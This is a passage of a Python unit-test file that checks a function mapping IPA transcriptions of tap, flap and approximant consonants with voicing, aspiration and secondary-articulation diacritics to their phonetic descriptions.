expected = "voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ⱱ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental tap or flap pulmonic egressive consonant
def test_ⱱ_is_the_representation_of_the_voiced_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ")
self.assertEqual(actual, expected)
# voiced labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʷ_is_the_representation_of_the_voiced_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱˠ_is_the_representation_of_the_voiced_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰʷ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰʲ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰˠ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant
def test_ⱱʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱʰˤ")
self.assertEqual(actual, expected)
def test_ⱱ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental tap or flap pulmonic egressive consonant"
actual = describe_transcription("ⱱ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊_is_the_representation_of_the_voiceless_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊")
self.assertEqual(actual, expected)
def test_ɾ̥_is_the_representation_of_the_voiceless_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʷ")
self.assertEqual(actual, expected)
def test_ɾ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʲ")
self.assertEqual(actual, expected)
def test_ɾ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ˠ")
self.assertEqual(actual, expected)
def test_ɾ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ˤ")
self.assertEqual(actual, expected)
def test_ɾ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɾ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar tap or flap pulmonic egressive consonant
def test_ɾ_is_the_representation_of_the_voiced_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ")
self.assertEqual(actual, expected)
# voiced labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾʷ_is_the_representation_of_the_voiced_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾʲ_is_the_representation_of_the_voiced_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾˠ_is_the_representation_of_the_voiced_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾˤ")
self.assertEqual(actual, expected)
# voiced aspirated alveolar tap or flap pulmonic egressive consonant
def test_ɾʰ_is_the_representation_of_the_voiced_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰʷ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰʲ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰˠ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant
def test_ɾʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾʰˤ")
self.assertEqual(actual, expected)
def test_ɾ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɾ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊_is_the_representation_of_the_voiceless_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊")
self.assertEqual(actual, expected)
def test_ɽ̥_is_the_representation_of_the_voiceless_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥")
self.assertEqual(actual, expected)
# voiceless labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʷ")
self.assertEqual(actual, expected)
def test_ɽ̥ʷ_is_the_representation_of_the_voiceless_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʲ")
self.assertEqual(actual, expected)
def test_ɽ̥ʲ_is_the_representation_of_the_voiceless_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ˠ")
self.assertEqual(actual, expected)
def test_ɽ̥ˠ_is_the_representation_of_the_voiceless_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ˤ")
self.assertEqual(actual, expected)
def test_ɽ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰ_is_the_representation_of_the_voiceless_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɽ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced retroflex tap or flap pulmonic egressive consonant
def test_ɽ_is_the_representation_of_the_voiced_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ")
self.assertEqual(actual, expected)
# voiced labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽʷ_is_the_representation_of_the_voiced_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʷ")
self.assertEqual(actual, expected)
# voiced palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽʲ_is_the_representation_of_the_voiced_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʲ")
self.assertEqual(actual, expected)
# voiced velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽˠ_is_the_representation_of_the_voiced_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽˤ_is_the_representation_of_the_voiced_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽˤ")
self.assertEqual(actual, expected)
# voiced aspirated retroflex tap or flap pulmonic egressive consonant
def test_ɽʰ_is_the_representation_of_the_voiced_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰʷ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰʲ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰˠ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant
def test_ɽʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽʰˤ")
self.assertEqual(actual, expected)
def test_ɽ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_tap_or_flap_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex tap or flap pulmonic egressive consonant"
actual = describe_transcription("ɽ̬ʰˤ")
self.assertEqual(actual, expected)
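# A possible refactor (sketch only, not used in this suite): these exhaustive
# symbol/description pairs could instead be table-driven with unittest's
# subTest, assuming describe_transcription is importable as above, e.g.:
#
#     CASES = [
#         ("ʋ̊", "voiceless labio-dental approximant pulmonic egressive consonant"),
#         ("ʋ̥", "voiceless labio-dental approximant pulmonic egressive consonant"),
#     ]
#
#     def test_describe_transcription_table(self):
#         for transcription, description in CASES:
#             with self.subTest(transcription=transcription):
#                 self.assertEqual(describe_transcription(transcription), description)
#
# The explicit one-method-per-case style kept here trades brevity for one
# named, individually reportable test per transcription.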
# voiceless labio-dental approximant pulmonic egressive consonant
def test_ʋ̊_is_the_representation_of_the_voiceless_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊")
self.assertEqual(actual, expected)
def test_ʋ̥_is_the_representation_of_the_voiceless_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʷ")
self.assertEqual(actual, expected)
def test_ʋ̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental approximant pulmonic egressive consonant
def test_ʋ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̊ʲ")
self.assertEqual(actual, expected)
def test_ʋ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental approximant pulmonic egressive consonant"
actual = describe_transcription("ʋ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental approximant pulmonic egressive consonant
